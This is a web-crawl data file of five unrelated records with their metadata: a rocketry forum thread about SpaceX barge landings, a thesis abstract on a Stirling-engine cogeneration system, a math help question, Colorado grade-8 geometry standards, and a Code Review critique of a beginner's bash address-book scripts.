to make it reuseable, Of course the reusable first stage is also compromised in that sense, an expendable version can put a greater payload into orbit. . They are cutting the engines off early and staging early, leaving about 15% of fuel to do the reentry and landing maneuvers with. But that might be a chicken-or-the-egg scenario. To have an ultimate goal of reusability, they would design the rocket from the start so that it could put a desired payload mass into orbit while having 15% of fuel left over. Well, originally Falcon-9 was shorter. Then they made the tanks longer&#8230;..probably in large part to being able to land and be reused (I wonder if the tanks were stretched by 15% plus the fuel needed to CARRY that extra 15%, hmmmm). Some experts think Space-X won't be able to do a reusable 2nd stage. But then many of them thought that having a reusable first stage was just sci-fi too and Space-X is ready to try it with a pretty good chance of success. - George Gassaway Last edited: georgegassaway The landing barge has been an interesting "new development". Although more in the form of being announced in the last few months, but in retrospect probably planned for years. The announced plan for landing the first stage, was to fly back to the launch site. Although that would require a lot more fuel (cost of payload mass) to stop the downrange momentum then thrust back. So it is a lot more efficient to let it fall on a mostly ballistic path and put a barge pretty much right under where it was going to splash down on a normal trajectory, requires a lot less fuel and therefore allows more payload to orbit. But of course more operational costs in having a barge and associated people, ship(s), and equipment at sea. The 15% of fuel left over that has been stated as needed for the landing..... it does not look like it burns the engines for THAT long on the successful ocean landings they have made. So that 15% might be the fuel needed to thrust back to the launch site and they only need a small amount of that 15% for sea/barge landings (they are only igniting three of the nine Merlin engines for the landings, and of course it is way lighter without all of the used up fuel mass and upper stage/payload gone). Anyway, they have applied for permission to have flights land back at CCAFS (Cape Canaveral Air Force Station), where they launch from. There are major safety issues though with a rocket coming "inboound". If things go wrong, a "self destruct" means that lots of pieces would fall down over a large area, very bad if it was coming down over populated land. There are ways of reducing those risks, it looks like a good plan, but in any case they do not have permission to land there yet. So, the news of the barge came out in recent months, sounding like a temporary plan for a handful of test flights. So if the landings succeed, then that may help to pave the way to getting permission to land back at the Cape. But the work that's been put into this barge does not seem to fit into a temporary 2-3 test flight program, then they'd not need it anymore. Because even if/when they get permission to land at the cape, they will need the barge anyway. Because of Falcon-9 Heavy: It will take off using three Falcon-9 first stages. BUT, the center core will get most of its fuel at first from the two side boosters, a cross-feed that IIRC has never been used on a real rocket vehicle, but is an extremely popular method in the game Kerbal Space Program (and VERY efficient. It is like being able to do a 2-stage rocket where the second stage engines get to also fire with the first stage engines, improving thrust to weight ratio by 50%, allowing for heavier upper stages/payload). So, it will fly on the three first stages until the outer boosters have to be separated, with enough fuel left for them to fly back and land. Then the core first stage will continue on with its fuel tanks nearly full, and fly a lot farther downrange until it needs to shut down to save some fuel for landing. It will separate, the second stage will fly on, and then that core stage will descend for a soft landing on....... something like a barge. So they will eventually need the barge for Falcon-9 Heavy. But it will come down a LOT farther downrange, so the barge will have to be stationed many hundreds of miles (maybe 1000 miles or more) farther out than for the current version. it would require a massive amount of fuel to be left over, shutting down way earlier, to try to get THAT stage to fly back to the Cape, due to its downrange velocity and distance. So my personal opinion is they have planned to use a barge for Falcon-9 Heavy's core all along, betting on the landing technology to work. And they may have figured they might need to have the barge for first test landings anyway, to prove themselves before they might be allowed to land them back at the Cape. At least, this is the case if the test landings work out and they can re-use those first stages. If there was some fatal flaw in the concept and they could never get it to work reliably, well, they would not have the game-changing savings they expect, but it looks like even the current expendable versions are cheaper than any other launch vehicles delivering similar payload masses into similar orbits. - George Gassaway Last edited: ThirstyBarbarian Well-Known Member TRF Supporter The landing barge has been an interesting "new development". Although more in the form of being announced in the last few months, but in retrospect probably planned for years. The announced plan for landing the first stage, was to fly back to the launch site. Although that would require a lot more fuel (cost of payload mass) to stop the downrange momentum then thrust back. So it is a lot more efficient to let it fall on a mostly ballistic path and put a barge pretty much right under where it was going to splash down on a normal trajectory, requires a lot less fuel and therefore allows more payload to orbit. But of course more operational costs in having a barge and associated people, ship(s), and equipment at sea. The 15% of fuel left over that has been stated as needed for the landing..... t does not look like it burns the engines for THAT long on the successful ocean landings they have made. So that 15% might be the fuel needed to thrust back to the launch site and they only need a small amount of that 15% for sea/barge landings (they are only igniting three of the nine Merlin engines for the landings, and of course it is way lighter without all of the used up fuel mass and upper stage/payload gone). Anyway, they have applied for permission ot have flights land back at CCAFS (Cape Canaveral Air Force Station), where they launch from. There are major safety issues though with a rocket coming "inboound". If things go wrong, a "self destruct" means that lots of pieces would fall down over a large area, very bad if it was coming down over populated land. There are ways of reducing those risks, it looks like a good plan, but in any case they do not have permission to land there yet. So, the news of the barge came out in recent months, sounding like a temporary plan for a handful of test flights. So if the landings succeed, then that may help to pave the way to getting permission to land back at the Cape. But the work that's been put into this barge does not seem to fit into a temporary 2-3 test flight program, then they'd not need it anymore. Because even if/when they get permission to land at the cape, they will need the barge anyway. Because of Falcon-9 Heavy: It will take off using three Falcon-9 first stages. BUT, the center core will get most of its fuel at first from the two side boosters, a cross-feed that IIRC has never been used on a real rocket vehicle, but is a much-loved method in the game Kerbal Space Program (and VERY efficient). So, it will fly on the three first stages until the outer boosters have to be separated, with enough fuel left for them to fly back and land. Then the core first stage will continue on with its fuel tanks nearly full, and fly a lot farther downrange until it needs to shut down to save some fuel for landing. It will separate, the second stage will fly on, and then that core stage will descend for a soft landing on....... something like a barge. So they will eventually need the barge for Falcon-9 Heavy. But it will come down a LOT farther downrange, so the barge will have to be stationed many hundreds of miles (maybe 1000 miles or more) farther out than for the current version. it would require a massive amount of fuel to be left over, shutting down way earlier, to try to get THAT stage to fly back to the Cape, due to its downrange velocity and distance. So my personal opinion is they have planned to use a barge for Falcon-9 Heavy's core all along, betting on the landing technology to work. At least, this is the case if the test landings work out and they can re-use those first stages. If there was some fatal flaw in the concept and they could never get it to work reliably, well, they would not have the game-changing savings they expect, but it looks like even the current expendable versions are cheaper than any other launch vehicles delivering similar payload masses into similar orbits. - George Gassaway They may have always planned to use the barge for some flights, even with permission to fly all the way back to the launch site. Depending on what amount of servicing the booster would need to be flown again, you might choose to do it just for fuel reasons. Instead of needing to save say 25% or 30% of the fuel to return all the way back to the launch site, maybe you could land the booster on the barge with only 10% to 15% of the fuel remaining. Then you could service and refuel the booster right there on the barge and THEN fly it back to the cape. That would allow more fuel to be used for a heavier payload or a higher orbit and less to be saved for the landing. For this flight, if they land successfully on the barge, are they planning to return it to shore by ship/barge? Or are they planning to fly it back? Last edited: georgegassaway For this flight, if they land successfully on the barge, are they planning to return it to shore by ship/barge? Or are they planning to fly it back? Well, they will not be able to fly it back to the Cape since they do not have permission to do so, period. And I figure your question meant via rocket power. Not via helicopter even if a Sikorsky SkyCrane could even lift it safely, much less travel that distance. So for now, at least, the question is moot. Some have interpreted things Musk has said or tweeted, to imply that if they did have permission to land then it would be refueled and flown from the barge to the Cape. But the more I look at this, the more I realize how cagey Musk has been about some things (like the "sudden" existence of the barge "for a few tests"). So take what people interpret Musk has implied with a grain of salt. Same for speculations, including mine. Only go by what they have said specifically. And they do not say specific things as much as people think they do. Often lot of generalities that can be interpreted different ways, or at the least not "promises". Indeed when Musk first mentioned that the next flight would try to land "on a solid surface", it was awhile before he said WHAT that solid surface was going to be, rather than just plain saying so to begin with. Oh, BTW, in early forum discussions of not having permission to land at the Cape, and then suddenly there was the barge, some thought that the barge would simply be placed in shallow and sheltered waters a few miles from shore. But no, it's going to be stationed right where the first stage's ballistic path will take it. Now maybe that would be to make a landing on the barge easier for the first few times, otherwise if they wanted to do tests to simulate a return to launch site (RTLS), the barge would indeed be stationed only a few miles out from the pad. Now maybe that would be for later testing. Or never part of the plan. Grain of salt. Musk. Cagey. - George Gassaway Last edited: ThirstyBarbarian Well-Known Member TRF Supporter Musk should see if he can buy a volcanic island somewhere in the middle of the ocean and fly his rockets from inside the volcano like a Bond villain. georgegassaway Musk should see if he can buy a volcanic island somewhere in the middle of the ocean and fly his rockets from inside the volcano like a Bond villain. Sounds Evil&#8230;. Long as Musk does not try to build large rockets that look like Bob's Big Boy&#8230;.. Last edited: jmattingly13 Well-Known Member Some experts think Space-X won't be able to do a reusable 2nd stage. But then many of them thought that having a reusable first stage was just sci-fi too and Space-X is ready to try it with a pretty good chance of success. The best way to ensure SpaceX achieves a reusable second stage is to tell Elon it can't be done. jmattingly13 Well-Known Member Musk should see if he can buy a volcanic island somewhere in the middle of the ocean and fly his rockets from inside the volcano like a Bond villain. Well, Kwaj was pretty close to that... MClark Well-Known Member Musk should see if he can buy a volcanic island somewhere in the middle of the ocean and fly his rockets from inside the volcano like a Bond villain. I talked to Steve Jurvetson about their buying an island for an evil lair. He said they had looked and the only one available was covered with bombs, an old Navy range near Puerto Rico. We agreed the bombs make it better but his lawyers would likely object. M luke strawwalker Well-Known Member Well, I have not found any info on a live feed of the landing. I did ask on a space site where there ought to be answers.... but nobody had any solid info. Sadly a few came up with some petty excuses such as Space-X might not have a live feed in case it does not succeed, only release video much later if it works. So, Cold War Russian Space Program style. I hope not. I have very SLOWLY built up my impressions of Space-X. If they didn't show something this historic for petty reasons, they are not the company I thought they are and not worth that trust. But again it's fanboys who wrote some of those pre-emptive petty excuses. So they may be wrong and Space-X perhaps has not made info on how/where to see a feed of the landing in an easy-to-find way (yet?). But it's very troubling that if there is to be a live feed of the landing, it's this hard to get info on. I'm not as high on this as I was 24 hours ago. What does come thru clear is that NASA is "the customer", and the NASA TV feed is not going to cover anything beyond launching the spacecraft into orbit and getting supplies to ISS. Just another routine unmanned launch of supplies to ISS.......which if it was true most space buffs would not bother to watch to begin with. UPDATE - Launch has slipped to Dec 19th: https://spaceflightnow.com/2014/12/11/launch-of-spacex-cargo-mission-slips-to-dec-19/ - George Gassaway At least they're not as "top secret!" as Blue Origin, from which we only have rumors and a few vague press releases over the last handful of years. SpaceX IS a private company... one which I've heard rumors is thinking of going public. (Publicly traded). If that's the case, you don't want to "scare off" investors with high-profile failures broadcast to the world (IF it happens to fail, which even Elon Musk only quotes a 50-50 shot of it working right). At any rate, public offerings aside, as a PRIVATE company, they don't *have* to broadcast ANY of their activities; though I think it is really to their benefit if they DO. But as far as an "obligation" goes, not so much-- their dime, their choice... NASA is NASA... they're only interested in what *NASA* does, what the flight has to do with *NASA*. There's plenty of PTB's that are VERY threatened by "nu-space" commercial companies and don't want to do *anything* that actually promotes them or benefits them. Some of those PTB's are within NASA; most are within the political structure that supports and benefits from NASA funding and policy (and usually has a mighty hand in making it). SO, I wouldn't say NASA *not* covering SpaceX's reusability activities is in any way surprising... Actually, I think SpaceX has been THE most forthcoming and open of the nu-space companies. They've been a little tight-lipped at times, but then who hasn't? If you want to compare a company to "Cold War secretive" only-broadcast-if-successful type stuff, well, Blue Origin has probably been more secretive in a lot of ways than the old Soviet space program ever was... or was during its darkest days in the late 50's/early 60's... All IMHO... Later! OL JR luke strawwalker Well-Known Member You know SpaceX has a lease with Spaceport America (right next to WSMR) for doing high altitude testing of Grasshopper/F9R? Nope, didn't know that... interesting! Thanks! OL JR luke strawwalker Well-Known Member They're not trying to recover the second stage at this point. Elon's goal is to make everything recoverable if possible, but for the reasons you've stated, the second stage is not quite there yet. "Not quite there yet" is a MASSIVE understatement... LOL Later! OL JR PS. Truth be known, MOST of the cost of the rocket is in the FIRST stage anyway-- it's the largest, the most structurally robust, and has the greatest amount of propulsion hardware (lots of engines or big powerful engines to get the thing off the launch pad and up to several times the speed of sound and about 40 miles high for the second stage to take over. While slowing something down and reentering the dense lower atmosphere, descending to a stable, controlled hover and pinpoint landing isn't trivial by ANY means, (else it would have been done before! The best Werner Von Braun and the NASA engineers did in the 60's was propose huge folding rogallo flex wings or parachute recovery for Saturn IB and Saturn V first stages), it is MUCH easier to accomplish from the, relatively speaking, MUCH lower velocities and energy levels of a first stage, and with the more robust construction (though larger dimensionally) of a first stage, and frankly there's more to be gained by reuse of a first (booster) stage. Not to say there's NO value in recovering upper stage(s), far from it. BUT, recovering something reentering from Mach 20 and 100 miles altitude halfway around the world, and recovering something from Mach 4+ reentering from 40 miles altitude a few hundred miles downrange from the pad, are orders of magnitude apart in complexity and difficulty. When you add in the fact that upper stages are usually built much lighter (since every pound of dry mass saved on the upper stage usually converts 1:1 to additional payload) the difficulties are compounded, because basically you're trying to recover an eggshell from orbit without breaking it. Reentry heating and loads are MUCH harder to deal with as well, and the extra weight of a heat shield, or extra propellant for deceleration and a "plug nozzle" heat shield, evaporatively cooled heatshield, whatever, landing gear, additional guidance/recovery hardware, etc... ALL that extra mass detracts virtually POUND FOR POUND from payload capability. (On first stages, depending on the particular design, it takes an extra 10 pounds of weight on the first stage to reduce payload by ONE pound!) When one adds in the inevitable reduced payload capacity and complexity and cost of a reusable upper stage, it's FAR less lucrative than recovering first stages. Later! OL JR luke strawwalker Well-Known Member Also another reason why SpaceX might have wanted the "landing barge" thingy. While the first stage might be able, eventually when proven capable and safe, to fly back to the launch pad (or nearby), the second stage is going to be WAY downrange and flying back would seem to be highly unlikely. Probably more like "once around" recovery... Anybody heard of "dynamic soaring"?? (Dyna-Soar). Seriously, yeah, a second stage doing a "ballistic reentry" will probably be over the Indian Ocean or South Pacific, depending on the trajectory. So an ocean recovery would seem necessary. The reason for the barge is this... Which profile looks safer and uses less fuel/more efficient to you?? Later! OL JR Zebedee Well-Known Member This stuff is awesome - thanks for posting George. I'm a huge fan of Elon and SpaceX - browsing their webstore last year and seeing that there was a model rocket which "needed engines to fly" and my subsequent internet research and purchase of an Estes launch set is what go me into model rocketry - 15 months later I'm HPR level 2 I'm looking forward to this launch and really hoping they land the first stage as planned.
2021-05-08 17:02:20
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24718312919139862, "perplexity": 1950.0926366447247}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243988882.94/warc/CC-MAIN-20210508151721-20210508181721-00464.warc.gz"}
https://tspace.library.utoronto.ca/handle/1807/25573
Home Browse Communities & Collections Issue Date Author Title Subject Sign on to: My Account authorized users Edit Profile Help Please use this identifier to cite or link to this item: http://hdl.handle.net/1807/25573 Title: Efficiency and Emissions Study of a Residential Micro–cogeneration System Based on a Stirling Engine and Fuelled by Diesel and Ethanol Authors: Farra, Nicolas Advisor: Thomson, Murray J. Department: Mechanical and Industrial Engineering Keywords: Stirling engineCogenerationEthanol Issue Date: 31-Dec-2010 Abstract: This study examined the performance of a residential micro–cogeneration system based on a Stirling engine and fuelled by diesel and ethanol. An extensive number of engine tests were conducted to ensure highly accurate and reproducible measurement techniques. Appropriate energy efficiencies were determined by performing an energy balance for each fuel. Particulate emissions were measured with an isokinetic particulate sampler, while a flame ionization detector was used to monitor unburned hydrocarbon emissions. Carbon monoxide, nitric oxide, nitrogen dioxide, carbon dioxide, water, formaldehyde, acetaldehyde and methane emissions were measured using a Fourier transform infrared spectrometer. When powered by ethanol, the system had slightly higher thermal efficiency, slightly lower power efficiency and considerable reductions in emission levels during steady state operation. To further study engine behaviour, parametric studies on primary engine set points, including coolant temperature and exhaust temperature, were also conducted. URI: http://hdl.handle.net/1807/25573 Appears in Collections: MasterDepartment of Mechanical & Industrial Engineering - Master theses Files in This Item: File Description SizeFormat
2014-04-18 05:54:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3060677945613861, "perplexity": 10751.011939899157}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1397609532573.41/warc/CC-MAIN-20140416005212-00654-ip-10-147-4-33.ec2.internal.warc.gz"}
http://openstudy.com/updates/55c4a088e4b0f6bb86c3d9e2
## anonymous one year ago can someone help me find an equation for the inverse of the function. f(x)=2x -3^x/4 1. anonymous Is this your equation? $$\huge f(x) = -3^{\frac{x}{4}} + 2x$$ Or is it this one $$\huge f(x) = -\frac{3^{x}}{4} + 2x$$ 2. anonymous Or is this your equation $$\huge f(x) = \frac{-3^{x} + 2x}{4}$$ Find more explanations on OpenStudy
2017-01-20 16:17:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5877249240875244, "perplexity": 1805.624856907995}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00572-ip-10-171-10-70.ec2.internal.warc.gz"}
https://www.cde.state.co.us/apps/standards/4,10,11
Use the options below to create customized views of the 2020 Colorado Academic Standards. For all standards resources, see the Office of Standards and Instructional Support. Current selections are shown below (maximum of five) clear Content Area: Mathematics // Grade Level: Eighth Grade // Standard Category: 4. Geometry Mathematics • MP3. Construct viable arguments and critique the reasoning of others. • MP5. Use appropriate tools strategically. • MP7. Look for and make use of structure. • MP8. Look for and express regularity in repeated reasoning. 8.G.A. Geometry: Understand congruence and similarity using physical models, transparencies, or geometry software. Evidence Outcomes: Students Can: 1. Verify experimentally the properties of rotations, reflections, and translations: (CCSS: 8.G.A.1) 1. Lines are taken to lines, and line segments to line segments of the same length. (CCSS: 8.G.A.1.a) 2. Angles are taken to angles of the same measure. (CCSS: 8.G.A.1.b) 3. Parallel lines are taken to parallel lines. (CCSS: 8.G.A.1.c) 2. Demonstrate that a two-dimensional figure is congruent to another if the second can be obtained from the first by a sequence of rotations, reflections, and translations; given two congruent figures, describe a sequence that exhibits the congruence between them. (CCSS: 8.G.A.2) 3. Describe the effect of dilations, translations, rotations, and reflections on two-dimensional figures using coordinates. (CCSS: 8.G.A.3) 4. Demonstrate that a two-dimensional figure is similar to another if the second can be obtained from the first by a sequence of rotations, reflections, translations, and dilations; given two similar two-dimensional figures, describe a sequence that exhibits the similarity between them. (CCSS: 8.G.A.4) 5. Use informal arguments to establish facts about the angle sum and exterior angle of triangles, about the angles created when parallel lines are cut by a transversal, and the angle-angle criterion for similarity of triangles. For example, arrange three copies of the same triangle so that the sum of the three angles appears to form a line, and give an argument in terms of transversals why this is so. (CCSS: 8.G.A.5) Colorado Essential Skills and Mathematical Practices: 1. Think about how rotations, reflections, and translations of a geometric figure preserve congruence as similar to how properties of operations such as the associative, commutative, and distributive properties preserve equivalence of arithmetic and algebraic expressions. (Entrepreneurial Skills: Critical Thinking/Problem Solving and Inquiry/Analysis) 2. Explain a sequence of transformations that results in a congruent or similar triangle. (MP3) 3. Use physical models, transparencies, geometric software, or other appropriate tools to explore the relationships between transformations and congruence and similarity. (MP5) 4. Use the structure of the coordinate system to describe the locations of figures obtained with rotations, reflections, and translations. (MP7) 5. Reason that since any one rotation, reflection, or translation of a figure preserves congruence, then any sequence of those transformations must also preserve congruence. (MP8) Inquiry Questions: 1. How are properties of rotations, reflections, translations, and dilations connected to congruence? 2. How are properties of rotations, reflections, translations, and dilations connected to similarity? 3. Why are angle measures significant regarding the similarity of two figures? Coherence Connections: 1. This expectation represents major work of the grade. 2. In previous grades, students solve problems involving angle measure, area, surface area, and volume, and draw, construct, and also describe geometrical figures and the relationships between them. 3. In Grade 8, this expectation connects with understanding the connections between proportional relationships, lines, and linear equations. 4. In high school, students extend their work with transformations, apply the concepts of transformations to prove geometric theorems, and use similarity to define trigonometric functions. • MP3. Construct viable arguments and critique the reasoning of others. • MP7. Look for and make use of structure. • MP8. Look for and express regularity in repeated reasoning. 8.G.B. Geometry: Understand and apply the Pythagorean Theorem. Evidence Outcomes: Students Can: 1. Explain a proof of the Pythagorean Theorem and its converse. (CCSS: 8.G.B.6) 2. Apply the Pythagorean Theorem to determine unknown side lengths in right triangles in real-world and mathematical problems in two and three dimensions. (CCSS: 8.G.B.7) 3. Apply the Pythagorean Theorem to find the distance between two points in a coordinate system. (CCSS: 8.G.B.8) Colorado Essential Skills and Mathematical Practices: 1. Think of the Pythagorean Theorem as not just a formula, but a formula that only holds true under certain conditions. (Entrepreneurial Skills: Inquiry/Analysis) 2. Construct a viable argument about why a proof of the Pythagorean Theorem is valid. (MP3) 3. Test to see if a triangle is a right triangle by applying the Pythagorean Theorem. (MP7) 4. Use patterns to recognize and generate Pythagorean triples. (MP8) Inquiry Questions: 1. What is the relationship between the Pythagorean Theorem and its converse? In what ways is each useful? 2. Is it always possible to use the Pythagorean Theorem to find the distance between points on the coordinate plane? How do you know? Coherence Connections: 1. This expectation represents major work of the grade. 2. In Grades 6 and 7, students solve real-life and mathematical problems involving angle measure, area, surface area, and volume. 3. In Grade 8, this expectation connects with radicals and integer exponents, square roots, and solving simple equations in the form $x^2 = p$. 4. In high school, students (a) prove and apply trigonometric identities, (b) prove theorems involving similarity, (c) define trigonometric ratios and solve problems involving right triangles, (d) translate between the geometric description and the equation for a conic section, and (e) use coordinates to prove simple geometric theorems algebraically. • MP3. Construct viable arguments and critique the reasoning of others. • MP6. Attend to precision. 8.G.C. Geometry: Solve real-world and mathematical problems involving volume of cylinders, cones, and spheres. Evidence Outcomes: Students Can: 1. State the formulas for the volumes of cones, cylinders, and spheres and use them to solve real-world and mathematical problems. (CCSS: 8.G.C.9) Colorado Essential Skills and Mathematical Practices: 1. Efficiently solve problems using established volume formulas. (Professional Skills: Task/Time Management) 2. Describe how the formulas for volumes of cones, cylinders, and spheres relate to one another and to the volume formulas for solids with rectangular bases. (MP3) 3. Use appropriate precision when solving problems involving measurements and volume formulas that describe real-world shapes. (MP6) Inquiry Questions: 1. How are the formulas of cones, cylinders, and spheres similar to each other? 2. How are the formulas of cones, cylinder, and spheres connected to the formulas for pyramids, prisms, and cubes? Coherence Connections: 1. This expectation is in addition to the major work of the grade. 2. In Grade 7, students solve real-world and mathematical problems involving area, volume, and surface area of two- and three-dimensional objects composed of triangles, quadrilaterals, polygons, cubes, and right prisms. 3. In Grade 8, this expectation connects with radicals and integer exponents. 4. In high school, students apply geometric concepts in mathematical modeling situations and to solve design problems. Need Help? Submit questions or requests for assistance to bruno_j@cde.state.co.us
2022-08-10 08:06:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6769171357154846, "perplexity": 1589.4429119478723}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571150.88/warc/CC-MAIN-20220810070501-20220810100501-00636.warc.gz"}
https://codereview.stackexchange.com/questions/96221/address-book-app-to-learn-bash
# Address book app to learn bash I'm fairly proficient in C and Python, but want to learn some skills for administrating my new Linux machine. I wrote this simple address book app to teach myself shell scripting. This is the first script I've written longer than a couple of lines. The address book is a plain text file stored in $HOME/.sab-db. Entries are separated by newlines and the three fields (first name, surname, email) are separated by colons, like the fields in /etc/passwd. The application is divided into four scripts that have a single task each. This is inspired by how Git is organized. Is this a good way to isolate independent code in bash? How should I handle shared code between scripts? I've use two different approaches below: I created a standalone script that the others call for determining the database name, and I copy-pasted the die function. I've heard of script sourcing, but I've never seen that used for creating bash "libraries". sab-find-db #!/bin/bash DB_NAME=".sab-db" if [ -n "$SAB_DB_DIR" ]; then echo "$SAB_DB_DIR/$DB_NAME" else echo "$HOME/$DB_NAME" fi sab-search #!/bin/bash function die { echo "$1" >&2 exit 1 } if [$# -eq 1 ]; then # Fields can't include : since it's the delimiter if [ $(echo "$1" | grep ":" | wc -l) -gt 0 ]; then exit 0 else file=$(mktemp) grep -i "$1" $(./sab-find-db) >"$file" 2>/dev/null fi elif [ $# -eq 0 ]; then file=$(./sab-find-db) else die "usage: $0 [<first name> | <surname> | <email>]" fi cat "$file" echo "First name: $(echo "$line" | cut -d: -f1 -)" echo "Surname: $(echo "$line" | cut -d: -f2 -)" echo "Email: $(echo "$line" | cut -d: -f3 -)" echo done <"$file" if [$# -eq 1 ]; then rm "$file" fi sab-add #!/bin/bash function die { echo "$1" >&2 exit 1 } if [ $# -eq 3 ]; then entry="$1:$2:$3" elif [ $# -eq 0 ]; then echo -n "First name: " read first_name echo -n "Surname: " read surname echo -n "Email: " read email entry="$first_name:$surname:$email" else die "usage: $0\n [<first name> <surname> <email>]" fi if [$(echo "$entry" | grep -o ":" | wc -l) -gt 2 ]; then die "Fields can't include colon" # Check if any : is next to another : or start or end of line elif [$(echo "$entry" | grep "$$^:$$\|$$::$$\|$$:$$" | wc -l) -gt 0 ]; then die "No fields can be left empty" elif [$(grep -i "^$entry\$" $(./sab-find-db) 2>/dev/null | wc -l) -gt 0 ]; then die "This entry already exists. It was not added again." else echo "$entry" >>$(./sab-find-db) fi sab-remove #!/bin/bash function die { echo "$1" >&2 exit 1 } if [ $(grep -i "\<$1\>" $(./sab-find-db) 2>/dev/null | wc -l) -eq 0 ]; then die "No match found" fi file=$(mktemp) if [ ! $(grep -vi "\<$1\>" $(./sab-find-db) >"$file" 2>/dev/null) ]; then mv "$file"$(./sab-find-db) else rm "$file" fi ## 2 Answers ### Your main questions The application is divided into four scripts that have a single task each. This is inspired by how Git is organized. Is this a good way to isolate independent code in bash? If the scripts are short, it's simpler to have all the code in one script, with each main functionality in its own function. If the scripts are longer, and you suspect that they will get longer and longer, then it makes sense to keep them as separate scripts in a dedicated directory. However, in this case, if the scripts need to call each other, then you need a way so that they can find each other. A simple way is to add the directory of the scripts to PATH. Another simple way is to require that users must cd into the directory of the scripts of they want to use them. Since you launch another script using the ./ prefix, that will only work if the other script is in the current directory. How should I handle shared code between scripts? I've use two different approaches below: I created a standalone script that the others call for determining the database name, and I copy-pasted the die function. I've heard of script sourcing, but I've never seen that used for creating bash "libraries". Yes, script sourcing is more common. Another benefit of that will be that you can define your common functions in one place, no need to copy-paste die into every script that needs it. Something I often do is cd to the directory of the script, and then source the common configuration and function definitions, like this: cd$(dirname "$0") . ./config.sh . ./functions.sh ### Function definitions The convention is to put parentheses in function definitions, and to omit the " function " keyword, like this: die() { echo "$1" >&2 exit 1 } ### Benefit from program exit codes You can benefit from the exit codes of programs more aggressively. For example instead of this: if [ $(echo "$1" | grep ":" | wc -l) -gt 0 ]; then It's better to write this way: if echo $1 | grep -q :; then There are several things going on here: • I omitted the quoting of $1, because for the purpose here, it doesn't matter • grep exits with success if a pattern is found • The -q flag makes grep output nothing, but that of course doesn't change the fact of success or not, it's just too avoid garbage output • The statement has been radically changed. Instead of comparing the output of the wc command, we are operating based on exit codes. There is no more [ ... ] We can do even better. Instead of echo, we can use "here strings" to cut out one more process: if grep -q : <<< "$1"; then But the best is to use pattern matching with [[: if [[$1 = *:* ]]; then Use the principle about exit codes to rewrite the rest of your code and the other scripts. ### Exit with non zero on error In many places you exit with code 1 to signal an error but not here: if [ $(echo "$1" | grep ":" | wc -l) -gt 0 ]; then exit 0 It would be better to echo a friendly message, and then exit with 1. ### Safety This part is a bit scary: if [ $# -eq 1 ]; then rm "$file" fi Within the same script, file is sometimes a temporary file, sometimes it's the actual database. This can be confusing. It's easy to make mistakes in shell scripting, and with one simple mistake, your database might go up in smoke. I suggest to reorganize your code: move this dangerous operation closer to the code that creates the temp file. In addition, refer to the temp file by a different name, and use that name in the rm command. In other words, make it really hard to mistakenly delete the wrong file. • Thank you for a great review! I've not seen pattern matching before. Does *: actually match a colon anywhere in the string like the regex : or just as the last character? – jacwah Jul 8 '15 at 